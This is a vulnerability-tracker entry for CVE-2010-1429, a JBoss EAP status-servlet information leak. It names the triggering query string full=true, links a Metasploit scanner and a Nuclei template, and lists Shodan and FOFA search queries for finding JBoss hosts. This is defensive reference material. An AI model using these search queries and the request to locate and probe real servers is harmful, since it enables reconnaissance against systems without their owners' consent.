CVE-2010-1429
NUCLEIRed Hat JBoss EAP <4.2.0.CP09 and <4.3.0.CP08 - Info Disclosure
Title source: llmDescription
Red Hat JBoss Enterprise Application Platform (aka JBoss EAP or JBEAP) 4.2 before 4.2.0.CP09 and 4.3 before 4.3.0.CP08 allows remote attackers to obtain sensitive information about "deployed web contexts" via a request to the status servlet, as demonstrated by a full=true query string. NOTE: this issue exists because of a CVE-2008-3273 regression.
Exploits (1)
metasploit
SCANNER
by Tyler Krpata, Zach Grace <@ztgrace> · rubypoc
https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/http/jboss_vulnscan.rb
Nuclei Templates (1)
Red Hat JBoss Enterprise Application Platform - Sensitive Information Disclosure
MEDIUMVERIFIEDby R12W4N
Shodan:
title:"JBoss" || cpe:"cpe:2.3:a:redhat:jboss_enterprise_application_platform" || http.title:"jboss"
FOFA:
title="jboss"
References (12)
Scores
EPSS
0.2736
EPSS Percentile
96.4%
Details
CWE
CWE-264
Status
published
Products (6)
redhat/jboss_enterprise_application_platform
4.2
redhat/jboss_enterprise_application_platform
4.2.0 cp01 (7 CPE variants)
redhat/jboss_enterprise_application_platform
4.3
redhat/jboss_enterprise_application_platform
4.3.0 cp01 (6 CPE variants)
redhat/jboss_enterprise_application_platform
< 4.2.0
redhat/jboss_enterprise_application_platform
< 4.3.0
Published
Apr 28, 2010
Tracked Since
Feb 18, 2026